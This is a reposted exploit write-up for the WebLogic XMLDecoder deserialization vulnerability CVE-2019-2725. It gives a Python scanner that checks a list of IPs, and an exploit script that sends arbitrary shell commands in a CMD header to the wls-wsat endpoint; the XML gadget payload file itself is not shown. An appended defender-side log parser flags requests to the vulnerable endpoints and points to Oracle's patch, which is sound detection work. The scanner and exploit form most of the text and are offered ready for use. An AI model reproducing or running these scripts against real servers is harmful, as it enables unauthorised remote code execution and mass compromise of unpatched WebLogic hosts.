WebLogic deserialization remote code execution exploit (CVE-2019-2725)

The vulnerable point is WebLogic's XMLDecoder deserialization flaw; the exploit simply constructs a clever gadget chain that bypasses the patches Oracle has released for this flaw over the years.

PoC:

Put the target IPs in ip.txt, then run the PoC to check them.

import requests
import time
import random

def exec_cmd(ip, cmd):
    # The vulnerable endpoint is the wls-wsat web service; the command is passed in the
    # CMD header and referenced by the XMLDecoder payload read from payload.txt.
    url = "http://" + ip + "/wls-wsat/CoordinatorPortType11"
    headers = {
        'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'CMD': cmd,
        'SOAPAction': '""',
        'Content-Type': 'text/xml'
    }
    with open('payload.txt', 'rb') as f:
        payloads = f.read()
    r = requests.post(url, headers=headers, data=payloads, timeout=5)
    return r.content.decode()

def test_poc(ip):
    # Echo a random token and look for it in the response to confirm execution
    check = str(int(time.time()) + int(random.uniform(1000, 9999)))
    out = exec_cmd(ip, 'echo ' + check)
    if check in out:
        print('vul finds:' + ip)

def main():
    print("put ips in ip.txt ")
    with open('ip.txt') as f:
        for line in f:
            ip = line.strip()  # drop the trailing newline, otherwise the URL is malformed
            if not ip:
                continue
            try:
                test_poc(ip)
            except Exception:
                pass
    print("End")

if __name__ == '__main__':
    main()

Exploit:

import requests
import sys

def exec_cmd(ip, cmd):
    # Same request as the PoC: the command travels in the CMD header alongside the
    # XMLDecoder payload from payload.txt
    url = "http://" + ip + "/wls-wsat/CoordinatorPortType11"
    headers = {
        'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'CMD': cmd,
        'SOAPAction': '""',
        'Content-Type': 'text/xml'
    }
    with open('payload.txt', 'rb') as f:
        payloads = f.read()
    r = requests.post(url, headers=headers, data=payloads, timeout=10)
    return r.content.decode()

def main():
    if len(sys.argv) < 3:
        print('usage: exp.py www.0dayhack.com:8080 whoami')
        sys.exit()
    ip = sys.argv[1]
    cmd = sys.argv[2]
    out = exec_cmd(ip, cmd)
    print(out)

if __name__ == '__main__':
    main()
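As an added defender-side example (not part of the original post), this scans constructed web-server access-log lines for requests to the wls-wsat endpoint the scripts above target, rating POSTs (the only way a SOAP body reaches XMLDecoder) higher than GETs. Assumed: Common Log Format with a trailing User-Agent field, and the `/_async/` prefix, which comes from Oracle's security alert for this CVE rather than from this page.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (Common Log Format with referer and User-Agent); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2019:10:01:02 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 500 3211 "-" "Apache-HttpClient/4.1.1 (java 1.5)"
10.0.0.9 - - [21/Apr/2019:10:01:05 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [21/Apr/2019:10:01:07 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0 "-" "Apache-HttpClient/4.1.1 (java 1.5)"
10.0.0.7 - - [21/Apr/2019:10:02:00 +0000] "GET /wls-wsat/CoordinatorPortType11?WSDL HTTP/1.1" 200 8802 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# wls-wsat is the endpoint the scripts above post to; _async is the other component named in
# Oracle's security alert for CVE-2019-2725 (assumption: not taken from this page).
WATCHED_PREFIXES = ('/wls-wsat/', '/_async/')
# User-Agent hard-coded in the scripts above; easily changed, so it only adds context.
SCRIPT_UA = 'Apache-HttpClient/4.1.1 (java 1.5)'

def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per request that touches a watched deserialization endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group('path').split('?', 1)[0]
        if not path.startswith(WATCHED_PREFIXES):
            continue
        # A SOAP body is only delivered by POST; a GET (e.g. ?WSDL) is reconnaissance at most.
        severity = 'high' if m.group('method') == 'POST' else 'info'
        findings.append({
            'src': m.group('src'), 'ts': m.group('ts'), 'path': path,
            'severity': severity, 'status': m.group('status'),
            'ua_matches_script': str(m.group('ua') == SCRIPT_UA),
        })
    return findings

def sources_with_posts(findings: List[Dict[str, str]]) -> List[str]:
    """Distinct client addresses that sent a high-severity (POST) request, in first-seen order."""
    seen = []
    for f in findings:
        if f['severity'] == 'high' and f['src'] not in seen:
            seen.append(f['src'])
    return seen

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f)
    print('hosts posting to watched endpoints:', sources_with_posts(scan_log(SAMPLE_LOG)))
```

Hosts in the high-severity list warrant a look at the WebLogic server logs for the same timestamps; the real mitigation is Oracle's patch and removing or access-restricting the wls-wsat component.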

Reposted from: https://www.0dayhack.com/post-883.html
